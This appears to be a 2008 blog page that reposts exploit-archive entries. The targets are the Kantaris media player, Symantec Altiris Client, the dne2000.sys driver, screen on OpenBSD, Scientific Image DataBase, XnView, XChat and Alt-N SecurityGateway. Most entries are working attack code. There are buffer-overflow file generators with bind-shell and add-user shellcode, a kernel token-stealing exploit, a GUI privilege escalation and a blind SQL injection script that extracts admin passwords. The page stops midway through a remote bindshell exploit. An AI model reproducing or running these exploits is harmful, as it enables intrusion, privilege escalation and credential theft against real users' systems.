Wednesday, July 30, 2008

Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit

###################################
#Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit
###################################

#!/usr/bin/python
#
# Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!]
#
# The following exploit will make a film.ssa file,
# just rename the file with the name of your movie, and use your imagination

# to pwn! :)
# Shellcode is local bind shell, just telnet to port:4444 to get command prompt :)
#
# BIG thanks to muts for helping
# and discovering a very interesting thing that we will publish soon

#
# I piss on your Business Networks course Igor Radusinovic! Go to hell!
#
# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan
# jorganwd [at] gmail [dot] com
# http://www.jorgan.users.cg.yu


import os

jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it...

# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
sc=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"

"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"

"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37"

"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"

"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"

"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48"
"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38"

"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36"
"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57"

"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50"

"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51"

"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"

"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46"

"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36"
"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c"

"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42"
"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"

"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46"
"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46"

"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"

"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc

fileHandle = open ( 'film.ssa', 'w' )

fileHandle.write ( '[Script Info]\n')
fileHandle.write ( 'ScriptType: v4.00\n')
fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n')
fileHandle.write ( 'Collisions: Normal\n\n')

fileHandle.write ( '[V4 Styles]\n\n')
fileHandle.write ( '[Events]\n')

fileHandle.write ( 'Dialogue: '+ bafer)
fileHandle.close()
Posted by at No comments:

Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exp

###################################
#Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exp
###################################

// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day)
//
// Affected Versions : Altiris Client 6.5.248
// Altiris Client 6.5.299
// Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
int id,a=0;
char langH[255][255];
char langO[255][255];
char wname[]="Altiris Client Service";

strcpy(langH[0x0c],"Aide de Windows");
strcpy(langH[0x09],"Windows Help");
strcpy(langH[0x0a],"Ayuda de Windows");

strcpy(langO[0x0c],"Ouvrir");
strcpy(langO[0x09],"Open");
strcpy(langO[0x0a],"Abrir");

printf("##########################################################\n");
printf("# Altiris Client Service #\n");
printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit #\n");
printf("# by sirdarckcat & alt3kx #\n");
printf("# #\n");
printf("# This exploit is based on www.milw0rm.com/exploits/350 #\n");
printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
printf("# by Cesar Cerrudo #\n");
printf("##########################################################\n\n");

id=PRIMARYLANGID(GetSystemDefaultLangID());
if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
printf("Lang not found, using english\n");
id=9;
}

char sText[]="%windir%\\system32\\cmd.ex?";

if (argc<2){
printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
printf("Look for your LANG-ID here:\n");
printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
printf("\nAnyway, the program will try to guess it.\n\n");
return 0;
}else{
if (argc==2){
if (langH[atoi(argv[1])]){
id=atoi(argv[1]);
printf("Lang changed\n");
}else{
printf("Lang not supported\n",id);
}
}
}
printf("Using Lang %d\n",id);
printf("Looking for %s..\n",wname);
lHandle=FindWindow(NULL, wname);
if (!lHandle) {
printf("Window %s not found\n", wname);
return 0;
}else{
printf("Found! exploiting..\n");
}
PostMessage(lHandle,0x313,NULL,NULL);

Sleep(100);

SendMessage(lHandle,0x365,NULL,0x1);
Sleep(300);
pp:
if (!FindWindow(NULL, langH[id])){
printf("Help Window not found.. exploit unsuccesful\n");
if (id!=9){
printf("Trying with english..\n");
id=9;
goto pp;
}else{
return 0;
}
}else{
printf("Help Window found! exploiting..\n");
}
SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(500);
lHandle = FindWindow("#32770",langO[id]);
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);
printf("Sending path..\n");
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
lHandle2 = GetDlgItem(lHandle, 0x4A0);
printf("Looking for cmd..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
lHandle2 = GetDlgItem(lHandle2, 0x1);
printf("Sending keys..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
Sleep(500);
mark:
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);
Sleep(1000);
printf("Opening shell..\n");
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
Sleep(1000);
if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
printf("Failed\n");
if (!a){
a++;
goto mark;
}
}else{
printf("Done!\n");
}
if(!a){
SendMessage (lHandle, WM_CLOSE,0,0);
Sleep(500);
SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
}else{
printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
}
return 0;
}
Posted by at No comments:

Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit

###################################
#Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit
###################################

/* dne2000-call.c
*
* Copyright (c) 2008 by
*
* Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit
* by mu-b - Sun 06 Jan 2008
*
* - Tested on: dne2000.sys 2.21.7.233 <-> 3.21.7.17464
* bundled with: SafeNET HighAssurance Remote, SoftRemote
* Cisco VPN Client
* Winproxy
*
* Compile: MinGW + -lntdll
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/

#include
#include

#include
#include

#define DNE_IOCTL 0x00222008
#define DNE_FLAG 0x00001005

#define ITEM_FLAG_1 0x4A424F4E
#define ITEM_FLAG_2 0x47554C50
#define FUNC_FLAG 0x00010003

static unsigned char win32_fixup[] =
"\x56";

static unsigned char win2k3_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\xb0\x18\x02\x00\x00"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

/* copy tokens!$%! */
"\x8b\x89\xd8\x00\x00\x00"
"\x89\x88\xd8\x00\x00\x00"
"\x90";

static unsigned char winxp_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\x70\x44"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

/* copy tokens!$%! */
"\x8b\x89\xc8\x00\x00\x00"
"\x89\x88\xc8\x00\x00\x00"
"\x90";

static unsigned char win32_ret[] =
"\x5e"
"\xc2\x10\x00";

struct ioctl_func {
char _pad[0x04];
int flag;
char __pad[0x2C];
void *func_ptr;
};

struct ioctl_item {
int flag;
char _pad[0x24];
struct ioctl_func *item_func;
struct ioctl_item *item_ptr;
};

struct ioctl_req {
int req_num;
struct ioctl_item *ptr[2];
};

static PCHAR
fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
DWORD dwVersion, dwMajorVersion, dwMinorVersion;

dwVersion = GetVersion ();
dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

if (dwMajorVersion != 5)
{
fprintf (stderr, "* GetVersion, unsupported version\n");
exit (EXIT_FAILURE);
}

switch (dwMinorVersion)
{
case 1:
*zlen = sizeof winxp_ring0_shell - 1;
*(PDWORD) &winxp_ring0_shell[55] = ppid;
return (winxp_ring0_shell);

case 2:
*zlen = sizeof win2k3_ring0_shell - 1;
*(PDWORD) &win2k3_ring0_shell[58] = ppid;
return (win2k3_ring0_shell);

default:
fprintf (stderr, "* GetVersion, unsupported version\n");
exit (EXIT_FAILURE);
}

return (NULL);
}

int
main (int argc, char **argv)
{
struct ioctl_req req;
struct ioctl_item items[2];
struct ioctl_func funcs;
LPVOID zpage, zbuf;
DWORD rlen, zlen, ppid;
HANDLE hFile;
BOOL result;

printf ("Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit\n"
"by: \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

if (argc <= 1)
{
fprintf (stderr, "Usage: %s \n", argv[0]);
exit (EXIT_SUCCESS);
}

ppid = atoi (argv[1]);

hFile = CreateFileA ("\\\\.\\DNE", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}

zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);

memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (ppid, &zlen);
memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
win32_ret, sizeof (win32_ret) - 1);

memset (&req, 0, sizeof req);
req.req_num = DNE_FLAG;
req.ptr[0] = NULL;
req.ptr[1] = &items[0];

memset (items, 0, sizeof items);
items[0].flag = ITEM_FLAG_1;
items[0].item_ptr = &items[1];

items[1].flag = ITEM_FLAG_2;
items[1].item_func = &funcs;

memset (&funcs, 0, sizeof funcs);
funcs.flag = FUNC_FLAG;
funcs.func_ptr = zpage;

printf ("* req.ptr: 0x%08X\n", &items[0]);
printf ("* @0x%08X: flag: 0x%08X, item_ptr: 0x%08X\n",
&items[0], items[0].flag, items[0].item_ptr);
printf ("* @0x%08X: flag: 0x%08X, item_func: 0x%08X\n",
items[0].item_ptr, items[1].flag, items[1].item_func);
printf ("* @0x%08X: flag: 0x%08X, func_ptr: 0x%08X\n",
items[1].item_func, funcs.flag, funcs.func_ptr);

/* jump to our address :) */
printf ("* jumping.. ");
result = DeviceIoControl (hFile, DNE_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");

CloseHandle (hFile);

return (EXIT_SUCCESS);
}
Posted by at No comments:

screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)

###################################
#screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)
###################################

_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
--------------------------------------------------------------------------------

Author: Rembrandt
Date : Known since somewhere in &cant_remember (some years, realy..)
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (wich will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

Greets go to: Helith and all affiliated/loyal people


I did not found a Advisory related to this so I decided to write a leet one.

screen is vulnerable to a authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But during the nature of the behavior of screen and OpenBSD it should be
architecture/version indipendent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and if you like screen-x to reattach the screen-session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of a locked screen you wont be able to lock your shell.
screen will never ask you for a password.

Of course this works also if you get access to a SSH wich has a locked
screen running. So in case you have locked your screen session wich contains
a open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Importent for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scarry Linux distributions
wich are not realy common.

All security websites wich do report this is a fake may consider to update their
reports except of simply claiming wrong things.

Have fun!
Posted by at No comments:

Scientific Image DataBase <= 0.41 Blind SQL Injection Exploit

###################################
#Scientific Image DataBase <= 0.41 Blind SQL Injection Exploit
###################################

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;

# Download: http://sidb.sourceforge.net/
# Dork: "Scientific Image DataBase"
# This exploit retrives the admin username/password via blind mysql injection.


print <-------------------------------------
- Scientific Image DataBase <= 0.41 -
- Blind SQL Injection Exploit -
- -
- Coded && Discovered By: t0pP8uZz -
- Discovered On: 19 JUNE 2008 -
-------------------------------------
-Greetz: muts, perlunderground, h-y -
- cipher, milw0rm -
-------------------------------------

INFO

print "Enter URL(ie: http://site.com): ";
chomp(my $url=);

my ($substr, $done, $chr, $res) = (1, 1, 48, "");

my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );
$ua->post($url."/login.php", { 'logon' => 'true', 'user' => 'guest', 'pwd' => 'guest', 'submit' => 'Login' } );

while($done) {
my $content = $ua->get($url."/projects.php?show=true&id=57%20and%20ascii(substring((select%20pwd%20from%20users%20where%20userid=1),".$substr.",1))=".$chr);

if($content->content =~ /Not meant/ && length($res) == 32) { $done = 0; }
elsif($content->content !~ /Not meant/) { $res .= chr($chr); $substr++; $chr = 48; }
else { $chr++; }
}
print "Username: sysadmin Password: ".$res."\n";
exit;
Posted by at No comments:

XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit

###################################
#XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit
###################################

#include
#include
/*
XnView 1.93.6 for Windows .taac buffer overflow proof of concept.

The vulnerability is caused due to a boundary error when processing
the "format" keyword of Sun TAAC files. This can be exploited to
cause a stack-based buffer overflow by e.g. tricking a user into
viewing a specially crafted Sun TAAC file.

Vulnerability discoverd by Secunia research http://secunia.com/secunia_research/2008-24/advisory/

Exploit code by Shinnok raydenxy@yahoo.com
http://www.rstcenter.com

This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows
will cause a buffer overflow and add an user "test" with password "test".
Tested on Windows XP sp2&sp3.

greetz to escalation666
/*

/* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf"
"\x93\x8f\x1e\x83\xeb\xfc\xe2\xf4\x43\x7b\xcb\x1e\xbf\x93\x04\x5b"
"\x83\x18\xf3\x1b\xc7\x92\x60\x95\xf0\x8b\x04\x41\x9f\x92\x64\x57"
"\x34\xa7\x04\x1f\x51\xa2\x4f\x87\x13\x17\x4f\x6a\xb8\x52\x45\x13"
"\xbe\x51\x64\xea\x84\xc7\xab\x1a\xca\x76\x04\x41\x9b\x92\x64\x78"
"\x34\x9f\xc4\x95\xe0\x8f\x8e\xf5\x34\x8f\x04\x1f\x54\x1a\xd3\x3a"
"\xbb\x50\xbe\xde\xdb\x18\xcf\x2e\x3a\x53\xf7\x12\x34\xd3\x83\x95"
"\xcf\x8f\x22\x95\xd7\x9b\x64\x17\x34\x13\x3f\x1e\xbf\x93\x04\x76"
"\x83\xcc\xbe\xe8\xdf\xc5\x06\xe6\x3c\x53\xf4\x4e\xd7\x63\x05\x1a"
"\xe0\xfb\x17\xe0\x35\x9d\xd8\xe1\x58\xf0\xe2\x7a\x91\xf6\xf7\x7b"
"\x9f\xbc\xec\x3e\xd1\xf6\xfb\x3e\xca\xe0\xea\x6c\x9f\xe7\xea\x6d"
"\xcb\xb3\xfb\x7b\xcc\xe7\xaf\x31\xfe\xd7\xcb\x3e\x99\xb5\xaf\x70"
"\xda\xe7\xaf\x72\xd0\xf0\xee\x72\xd8\xe1\xe0\x6b\xcf\xb3\xce\x7a"
"\xd2\xfa\xe1\x77\xcc\xe7\xfd\x7f\xcb\xfc\xfd\x6d\x9f\xe7\xea\x6d"
"\xcb\xb3\xa0\x5f\xfb\xd7\x8f\x1e";


unsigned char ra_sp2[] = "\xed\x1e\x94\x7c";
unsigned char ra_sp3[] = "\x83\xbf\x8a\x5b";

unsigned char nops1[257]; //256 * \x90
unsigned char nops2[21]; //20 * \x90

int main(int argc, char **argv)
{
int i;
FILE* f;
printf("[+] XnView 1.93.6 for Windows .taac buffer overflow\n");
printf("[+] Discovered by Secunia : \nhttp://secunia.com/secunia_research/2008-24/advisory/\n");
printf("[+] Coded by shinnok,greetz to escalation666.\n http://www.rstcenter.com \n");
if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){
printf("Usage: %s target\n",argv[0]);
printf("Where target is:\n");
printf("0: WinXP SP2\n");
printf("1: WinXP SP3\n");
printf("Successfull exploitation will result in the adding of user \"test\" with password \"test\".\n");
return EXIT_SUCCESS;
}
for(i=0;i<256;i++) nops1[i]='\x90';
nops1[256]='\0';
for(i=0;i<14;i++) nops2[i]='\x90';
nops2[20]='\0';
if(atoi(argv[1])==0) {
f=fopen("sploit.taac","wb");
fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa');
fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'\xa');
}else{
f=fopen("sploit.taac","wb");
fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa');
fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'\xa');
}
fclose(f);
printf("sploit.taac created!\n");
printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.\n");
printf("Then check with \"net user\" or from control panel for the user account test.\n");
return EXIT_SUCCESS;
}
Posted by at No comments:

muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit

###################################
#muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit
###################################







Posted by at No comments:

XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)

###################################
#XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)
###################################

##################################################################################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approch is a bit different.
# We don't use any % or ../../../ as the others related bugs, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
#
# Poc: this only launch the calc, sky is the limit passed this point.

Welcome to my personal website




Posted by at No comments:

Alt-N SecurityGateway 1.00-1.01 Remote Stack Overflow Exploit

###################################
#Alt-N SecurityGateway 1.00-1.01 Remote Stack Overflow Exploit
###################################

/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Details : Obtain the overflow and crash the application is peace a cake job.
* To make a wroking code execution here is a hell. First we can see that
* the username before overflow the buffer pass through some functions,
* that changes and restrict some useful chars. Firstly the beffer gets
* lowered so the overflow should not contain upper chars :( . So i decided
* to use some encoders for the payload like nonupper and non alpha from MSF.
* The nonupper use the `@` (0x40) char which the app doesn't eat at all.
* The nonalpha encoder in decoder code and the generated body contained
* always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1,
* 0x90, 0x91. Don't know, may be this chars translation was due to my russian locale.
* After few days of work i have comed with the required bindshell which bypass
* all restricted chars and executes. Thx to skylined, for his alpha tool.
* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
* 0xC1 0xC2 0x80 0x81
* ----------------------------------------
* Thanks to:
* 1. securfrog ( )
* 2. ALPHA 2: Zero-tolerance ( )
* 3. The Metasploit project ( http://metasploit.com )
* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/

#include
#include
#include
#include
#include

#pragma comment(lib,"ws2_32")


void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);

void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);

int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);

struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);




// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------


struct {
const char * name;
int length;
char *shellcode;
}shellcodes[]={
{"Bindshell, port 9998", 743,
/* The non-encoded metasploit payload
* windows/shell_bind_tcp - 317 bytes
* http://www.metasploit.com
* Encoder: generic/none
*/
/*
* Encoder: heretic2's nonupper. with help of skylined tool.
*/
